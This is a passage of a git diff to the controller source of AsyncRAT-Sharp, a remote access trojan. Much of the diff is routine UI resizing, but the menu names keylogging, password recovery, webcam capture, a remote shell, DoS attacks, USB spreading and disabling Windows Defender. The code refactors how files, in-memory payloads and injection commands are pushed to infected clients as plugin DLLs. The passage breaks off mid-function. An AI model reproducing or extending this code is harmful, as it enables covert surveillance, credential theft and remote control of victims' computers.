this.contextMenuClient.Name = "contextMenuStrip1";
- this.contextMenuClient.Size = new System.Drawing.Size(203, 240);
+ this.contextMenuClient.Size = new System.Drawing.Size(195, 240);
//
// aBOUTToolStripMenuItem
//
this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
- this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
//
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
- this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
+ this.toolStripSeparator2.Size = new System.Drawing.Size(237, 6);
//
// sENDFILEToolStripMenuItem
//
@@ -244,14 +242,14 @@
this.tODISKToolStripMenuItem});
this.sENDFILEToolStripMenuItem.Image = global::Server.Properties.Resources.tomem;
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
- this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.sENDFILEToolStripMenuItem.Text = "Send File";
//
// tOMEMORYToolStripMenuItem
//
this.tOMEMORYToolStripMenuItem.Image = global::Server.Properties.Resources.tomem1;
this.tOMEMORYToolStripMenuItem.Name = "tOMEMORYToolStripMenuItem";
- this.tOMEMORYToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.tOMEMORYToolStripMenuItem.Size = new System.Drawing.Size(206, 34);
this.tOMEMORYToolStripMenuItem.Text = "To Memory";
this.tOMEMORYToolStripMenuItem.Click += new System.EventHandler(this.TOMEMORYToolStripMenuItem_Click);
//
@@ -259,7 +257,7 @@
//
this.tODISKToolStripMenuItem.Image = global::Server.Properties.Resources.tomem1;
this.tODISKToolStripMenuItem.Name = "tODISKToolStripMenuItem";
- this.tODISKToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.tODISKToolStripMenuItem.Size = new System.Drawing.Size(206, 34);
this.tODISKToolStripMenuItem.Text = "To Disk";
this.tODISKToolStripMenuItem.Click += new System.EventHandler(this.TODISKToolStripMenuItem_Click);
//
@@ -275,14 +273,14 @@
this.webcamToolStripMenuItem});
this.monitoringToolStripMenuItem.Image = global::Server.Properties.Resources.monitoring_system;
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
- this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.monitoringToolStripMenuItem.Text = "Monitoring";
//
// remoteDesktopToolStripMenuItem1
//
this.remoteDesktopToolStripMenuItem1.Image = global::Server.Properties.Resources.remotedesktop;
this.remoteDesktopToolStripMenuItem1.Name = "remoteDesktopToolStripMenuItem1";
- this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(267, 34);
this.remoteDesktopToolStripMenuItem1.Text = "Remote Desktop";
this.remoteDesktopToolStripMenuItem1.Click += new System.EventHandler(this.RemoteDesktopToolStripMenuItem1_Click);
//
@@ -290,7 +288,7 @@
//
this.keyloggerToolStripMenuItem1.Image = global::Server.Properties.Resources.logger;
this.keyloggerToolStripMenuItem1.Name = "keyloggerToolStripMenuItem1";
- this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(267, 34);
this.keyloggerToolStripMenuItem1.Text = "Keylogger";
this.keyloggerToolStripMenuItem1.Click += new System.EventHandler(this.KeyloggerToolStripMenuItem1_Click);
//
@@ -298,7 +296,7 @@
//
this.passwordRecoveryToolStripMenuItem1.Image = global::Server.Properties.Resources.key;
this.passwordRecoveryToolStripMenuItem1.Name = "passwordRecoveryToolStripMenuItem1";
- this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(267, 34);
this.passwordRecoveryToolStripMenuItem1.Text = "Password Recovery";
this.passwordRecoveryToolStripMenuItem1.Click += new System.EventHandler(this.PasswordRecoveryToolStripMenuItem1_Click);
//
@@ -306,7 +304,7 @@
//
this.fileManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.filemanager;
this.fileManagerToolStripMenuItem1.Name = "fileManagerToolStripMenuItem1";
- this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(267, 34);
this.fileManagerToolStripMenuItem1.Text = "File Manager";
this.fileManagerToolStripMenuItem1.Click += new System.EventHandler(this.FileManagerToolStripMenuItem1_Click);
//
@@ -314,7 +312,7 @@
//
this.processManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.process;
this.processManagerToolStripMenuItem1.Name = "processManagerToolStripMenuItem1";
- this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(267, 34);
this.processManagerToolStripMenuItem1.Text = "Process Manager";
this.processManagerToolStripMenuItem1.Click += new System.EventHandler(this.ProcessManagerToolStripMenuItem1_Click);
//
@@ -325,7 +323,7 @@
this.stopToolStripMenuItem2});
this.reportWindowToolStripMenuItem.Image = global::Server.Properties.Resources.report;
this.reportWindowToolStripMenuItem.Name = "reportWindowToolStripMenuItem";
- this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(267, 34);
this.reportWindowToolStripMenuItem.Text = "Report Window";
//
// runToolStripMenuItem1
@@ -346,7 +344,7 @@
//
this.webcamToolStripMenuItem.Image = global::Server.Properties.Resources.webcam;
this.webcamToolStripMenuItem.Name = "webcamToolStripMenuItem";
- this.webcamToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.webcamToolStripMenuItem.Size = new System.Drawing.Size(267, 34);
this.webcamToolStripMenuItem.Text = "Webcam";
this.webcamToolStripMenuItem.Click += new System.EventHandler(this.WebcamToolStripMenuItem_Click);
//
@@ -361,14 +359,14 @@
this.executeNETCodeToolStripMenuItem});
this.miscellaneousToolStripMenuItem.Image = global::Server.Properties.Resources.Miscellaneous;
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
- this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
//
// botsKillerToolStripMenuItem
//
this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
- this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
this.botsKillerToolStripMenuItem.Click += new System.EventHandler(this.BotsKillerToolStripMenuItem_Click);
//
@@ -376,7 +374,7 @@
//
this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
- this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click);
//
@@ -384,7 +382,7 @@
//
this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
- this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
this.seedTorrentToolStripMenuItem1.Click += new System.EventHandler(this.SeedTorrentToolStripMenuItem1_Click_1);
//
@@ -392,7 +390,7 @@
//
this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
- this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
this.remoteShellToolStripMenuItem1.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem1_Click_1);
//
@@ -400,7 +398,7 @@
//
this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
- this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1);
//
@@ -408,7 +406,7 @@
//
this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
- this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
this.executeNETCodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteNETCodeToolStripMenuItem_Click_1);
//
@@ -420,11 +418,10 @@
this.chatToolStripMenuItem1,
this.getAdminPrivilegesToolStripMenuItem,
this.blankScreenToolStripMenuItem,
- this.disableWindowsDefenderToolStripMenuItem,
- this.disableNetStatToolStripMenuItem});
+ this.disableWindowsDefenderToolStripMenuItem});
this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
- this.extraToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.extraToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.extraToolStripMenuItem.Text = "Extra";
//
// visitWebsiteToolStripMenuItem1
@@ -475,15 +472,6 @@
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
this.disableWindowsDefenderToolStripMenuItem.Click += new System.EventHandler(this.DisableWindowsDefenderToolStripMenuItem_Click_1);
//
- // disableNetStatToolStripMenuItem
- //
- this.disableNetStatToolStripMenuItem.Image = global::Server.Properties.Resources.netstat;
- this.disableNetStatToolStripMenuItem.Name = "disableNetStatToolStripMenuItem";
- this.disableNetStatToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
- this.disableNetStatToolStripMenuItem.Text = "Disable NetStat";
- this.disableNetStatToolStripMenuItem.Visible = false;
- this.disableNetStatToolStripMenuItem.Click += new System.EventHandler(this.DisableNetStatToolStripMenuItem_Click);
- //
// systemToolStripMenuItem
//
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -491,7 +479,7 @@
this.pCToolStripMenuItem});
this.systemToolStripMenuItem.Image = global::Server.Properties.Resources.system;
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
- this.systemToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.systemToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.systemToolStripMenuItem.Text = "System";
//
// clientToolStripMenuItem
@@ -505,46 +493,46 @@
this.showFolderToolStripMenuItem});
this.clientToolStripMenuItem.Image = global::Server.Properties.Resources.client;
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
- this.clientToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.clientToolStripMenuItem.Text = "Client";
//
// closeToolStripMenuItem1
//
this.closeToolStripMenuItem1.Name = "closeToolStripMenuItem1";
- this.closeToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.closeToolStripMenuItem1.Size = new System.Drawing.Size(213, 34);
this.closeToolStripMenuItem1.Text = "Close";
this.closeToolStripMenuItem1.Click += new System.EventHandler(this.CloseToolStripMenuItem1_Click);
//
// restartToolStripMenuItem2
//
this.restartToolStripMenuItem2.Name = "restartToolStripMenuItem2";
- this.restartToolStripMenuItem2.Size = new System.Drawing.Size(270, 34);
+ this.restartToolStripMenuItem2.Size = new System.Drawing.Size(213, 34);
this.restartToolStripMenuItem2.Text = "Restart";
this.restartToolStripMenuItem2.Click += new System.EventHandler(this.RestartToolStripMenuItem2_Click);
//
// updateToolStripMenuItem2
//
this.updateToolStripMenuItem2.Name = "updateToolStripMenuItem2";
- this.updateToolStripMenuItem2.Size = new System.Drawing.Size(270, 34);
+ this.updateToolStripMenuItem2.Size = new System.Drawing.Size(213, 34);
this.updateToolStripMenuItem2.Text = "Update";
this.updateToolStripMenuItem2.Click += new System.EventHandler(this.UpdateToolStripMenuItem2_Click);
//
// uninstallToolStripMenuItem
//
this.uninstallToolStripMenuItem.Name = "uninstallToolStripMenuItem";
- this.uninstallToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.uninstallToolStripMenuItem.Size = new System.Drawing.Size(213, 34);
this.uninstallToolStripMenuItem.Text = "Uninstall";
this.uninstallToolStripMenuItem.Click += new System.EventHandler(this.UninstallToolStripMenuItem_Click);
//
// toolStripSeparator3
//
this.toolStripSeparator3.Name = "toolStripSeparator3";
- this.toolStripSeparator3.Size = new System.Drawing.Size(267, 6);
+ this.toolStripSeparator3.Size = new System.Drawing.Size(210, 6);
//
// showFolderToolStripMenuItem
//
this.showFolderToolStripMenuItem.Name = "showFolderToolStripMenuItem";
- this.showFolderToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.showFolderToolStripMenuItem.Size = new System.Drawing.Size(213, 34);
this.showFolderToolStripMenuItem.Text = "Show Folder";
this.showFolderToolStripMenuItem.Click += new System.EventHandler(this.ShowFolderToolStripMenuItem_Click);
//
@@ -556,40 +544,40 @@
this.shutdownToolStripMenuItem1});
this.pCToolStripMenuItem.Image = global::Server.Properties.Resources.pc;
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
- this.pCToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
+ this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.pCToolStripMenuItem.Text = "PC";
//
// logoffToolStripMenuItem1
//
this.logoffToolStripMenuItem1.Name = "logoffToolStripMenuItem1";
- this.logoffToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.logoffToolStripMenuItem1.Size = new System.Drawing.Size(195, 34);
this.logoffToolStripMenuItem1.Text = "Logoff";
this.logoffToolStripMenuItem1.Click += new System.EventHandler(this.LogoffToolStripMenuItem1_Click);
//
// restartToolStripMenuItem3
//
this.restartToolStripMenuItem3.Name = "restartToolStripMenuItem3";
- this.restartToolStripMenuItem3.Size = new System.Drawing.Size(270, 34);
+ this.restartToolStripMenuItem3.Size = new System.Drawing.Size(195, 34);
this.restartToolStripMenuItem3.Text = "Restart";
this.restartToolStripMenuItem3.Click += new System.EventHandler(this.RestartToolStripMenuItem3_Click);
//
// shutdownToolStripMenuItem1
//
this.shutdownToolStripMenuItem1.Name = "shutdownToolStripMenuItem1";
- this.shutdownToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
+ this.shutdownToolStripMenuItem1.Size = new System.Drawing.Size(195, 34);
this.shutdownToolStripMenuItem1.Text = "Shutdown";
this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click);
//
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
- this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
+ this.toolStripSeparator1.Size = new System.Drawing.Size(237, 6);
//
// bUILDERToolStripMenuItem
//
this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
- this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
+ this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
this.bUILDERToolStripMenuItem.Text = "BUILDER";
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
//
@@ -675,6 +663,7 @@
this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView2.FullRowSelect = true;
this.listView2.GridLines = true;
+ this.listView2.HideSelection = false;
this.listView2.Location = new System.Drawing.Point(3, 3);
this.listView2.Name = "listView2";
this.listView2.ShowGroups = false;
@@ -696,7 +685,6 @@
//
// contextMenuLogs
//
- this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.cLEARToolStripMenuItem});
this.contextMenuLogs.Name = "contextMenuLogs";
@@ -724,6 +712,7 @@
//
this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView3.HideSelection = false;
this.listView3.LargeImageList = this.ThumbnailImageList;
this.listView3.Location = new System.Drawing.Point(0, 0);
this.listView3.Name = "listView3";
@@ -735,12 +724,11 @@
//
// contextMenuThumbnail
//
- this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.sTARTToolStripMenuItem,
this.sTOPToolStripMenuItem});
this.contextMenuThumbnail.Name = "contextMenuStrip2";
- this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
+ this.contextMenuThumbnail.Size = new System.Drawing.Size(136, 68);
//
// sTARTToolStripMenuItem
//
@@ -784,6 +772,7 @@
this.listView4.ContextMenuStrip = this.contextMenuTasks;
this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView4.FullRowSelect = true;
+ this.listView4.HideSelection = false;
this.listView4.Location = new System.Drawing.Point(3, 3);
this.listView4.Name = "listView4";
this.listView4.Size = new System.Drawing.Size(1320, 440);
@@ -803,7 +792,6 @@
//
// contextMenuTasks
//
- this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.pASSWORDRECOVERYToolStripMenuItem,
this.downloadAndExecuteToolStripMenuItem,
@@ -878,11 +866,6 @@
this.TimerTask.Interval = 5000;
this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
//
- // GetThumbnails
- //
- this.GetThumbnails.Interval = 5000;
- this.GetThumbnails.Tick += new System.EventHandler(this.GetThumbnails_Tick);
- //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@@ -892,6 +875,7 @@
this.Controls.Add(this.statusStrip1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "Form1";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "AsyncRAT-Sharp";
this.Activated += new System.EventHandler(this.Form1_Activated);
this.Deactivate += new System.EventHandler(this.Form1_Deactivate);
@@ -1000,12 +984,10 @@
private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel2;
private System.Windows.Forms.ToolStripMenuItem executeNETCodeToolStripMenuItem;
private System.Windows.Forms.ColumnHeader lv_av;
- public System.Windows.Forms.Timer GetThumbnails;
private System.Windows.Forms.ToolStripMenuItem pASSWORDRECOVERYToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem blankScreenToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem getAdminPrivilegesToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem disableWindowsDefenderToolStripMenuItem;
- private System.Windows.Forms.ToolStripMenuItem disableNetStatToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem webcamToolStripMenuItem;
}
}
diff --git a/AsyncRAT-C#/Server/Forms/Form1.cs b/AsyncRAT-C#/Server/Forms/Form1.cs
index a3598ed..88a7dea 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.cs
+++ b/AsyncRAT-C#/Server/Forms/Form1.cs
@@ -16,6 +16,7 @@ using Server.Handle_Packet;
using Server.Helper;
using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic;
+using System.Runtime.InteropServices;
/*
│ Author : NYAN CAT
@@ -33,7 +34,13 @@ namespace Server
public Form1()
{
InitializeComponent();
- this.Opacity = 0;
+ SetWindowTheme(listView1.Handle, "explorer", null);
+ this.Opacity = 0;
+ formDOS = new FormDOS
+ {
+ Name = "DOS",
+ Text = "DOS",
+ };
}
private Listener listener;
@@ -135,6 +142,8 @@ namespace Server
ListviewDoubleBuffer.Enable(listView2);
ListviewDoubleBuffer.Enable(listView3);
+ Methods.SetPlugins();
+
CheckFiles();
lvwColumnSorter = new ListViewColumnSorter();
this.listView1.ListViewItemSorter = lvwColumnSorter;
@@ -293,9 +302,18 @@ namespace Server
{
if (listView1.Items.Count > 0)
{
- GetThumbnails.Stop();
- GetThumbnails.Start();
- GetThumbnails.Tag = (object)"started";
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "thumbnails";
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
+ foreach (Clients client in GetAllClients())
+ {
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ }
}
}
@@ -303,8 +321,17 @@ namespace Server
{
try
{
- GetThumbnails.Tag = (object)"stopped";
- GetThumbnails.Stop();
+ if (listView1.Items.Count > 0)
+ {
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "thumbnailsStop";
+
+ foreach (ListViewItem itm in listView3.Items)
+ {
+ Clients client = (Clients)itm.Tag;
+ ThreadPool.QueueUserWorkItem(client.Send, packet.Encode2Bytes());
+ }
+ }
listView3.Items.Clear();
ThumbnailImageList.Images.Clear();
foreach (ListViewItem itm in listView1.Items)
@@ -323,11 +350,16 @@ namespace Server
OpenFileDialog openFileDialog = new OpenFileDialog();
if (openFileDialog.ShowDialog() == DialogResult.OK)
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendFile";
+ packet.ForcePathObject("Update").AsString = "false";
+ await packet.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName);
+ packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName);
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendFile";
- msgpack.ForcePathObject("Update").AsString = "false";
- await msgpack.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName);
- msgpack.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName);
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
ListViewItem lv = new ListViewItem();
lv.Text = "SendFile: " + Path.GetFileName(openFileDialog.FileName);
@@ -366,18 +398,16 @@ namespace Server
formSend.ShowDialog();
if (formSend.toolStripStatusLabel1.Text.Length > 0 && formSend.toolStripStatusLabel1.ForeColor == Color.Green)
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendMemory";
- msgpack.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString()));
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendMemory";
+ packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString()));
if (formSend.comboBox1.SelectedIndex == 0)
{
- msgpack.ForcePathObject("Inject").AsString = "";
- msgpack.ForcePathObject("Plugin").SetAsBytes(new byte[1]);
+ packet.ForcePathObject("Inject").AsString = "";
}
else
{
- msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
- msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.PluginRunPE);
+ packet.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
}
ListViewItem lv = new ListViewItem();
@@ -385,6 +415,11 @@ namespace Server
lv.SubItems.Add("0");
lv.ToolTipText = Guid.NewGuid().ToString();
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
if (listView4.Items.Count > 0)
{
foreach (ListViewItem item in listView4.Items)
@@ -418,11 +453,16 @@ namespace Server
OpenFileDialog openFileDialog = new OpenFileDialog();
if (openFileDialog.ShowDialog() == DialogResult.OK)
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendFile";
+ await packet.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName);
+ packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName);
+ packet.ForcePathObject("Update").AsString = "true";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendFile";
- await msgpack.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName);
- msgpack.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName);
- msgpack.ForcePathObject("Update").AsString = "true";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
ListViewItem lv = new ListViewItem();
lv.Text = "Update: " + Path.GetFileName(openFileDialog.FileName);
@@ -528,24 +568,25 @@ namespace Server
formSend.ShowDialog();
if (formSend.IsOK)
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendMemory";
- msgpack.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString()));
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendMemory";
+ packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString()));
if (formSend.comboBox1.SelectedIndex == 0)
{
- msgpack.ForcePathObject("Inject").AsString = "";
- msgpack.ForcePathObject("Plugin").SetAsBytes(new byte[1]);
+ packet.ForcePathObject("Inject").AsString = "";
}
else
{
- msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
- msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.PluginRunPE);
- // github.com/Artiist/RunPE-Process-Protection
+ packet.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
}
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
@@ -567,16 +608,21 @@ namespace Server
openFileDialog.Multiselect = true;
if (openFileDialog.ShowDialog() == DialogResult.OK)
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendFile";
+ packet.ForcePathObject("Update").AsString = "false";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendFile";
- msgpack.ForcePathObject("Update").AsString = "false";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
foreach (string file in openFileDialog.FileNames)
{
- await msgpack.ForcePathObject("File").LoadFileAsBytes(file);
- msgpack.ForcePathObject("Extension").AsString = Path.GetExtension(file);
+ await packet.ForcePathObject("File").LoadFileAsBytes(file);
+ packet.ForcePathObject("Extension").AsString = Path.GetExtension(file);
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
@@ -598,7 +644,11 @@ namespace Server
listView2.Items.Clear();
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void VisitWebsiteToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -610,46 +660,67 @@ namespace Server
return;
else
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "visitURL";
+ packet.ForcePathObject("URL").AsString = url;
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "visitURL";
- msgpack.ForcePathObject("URL").AsString = url;
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
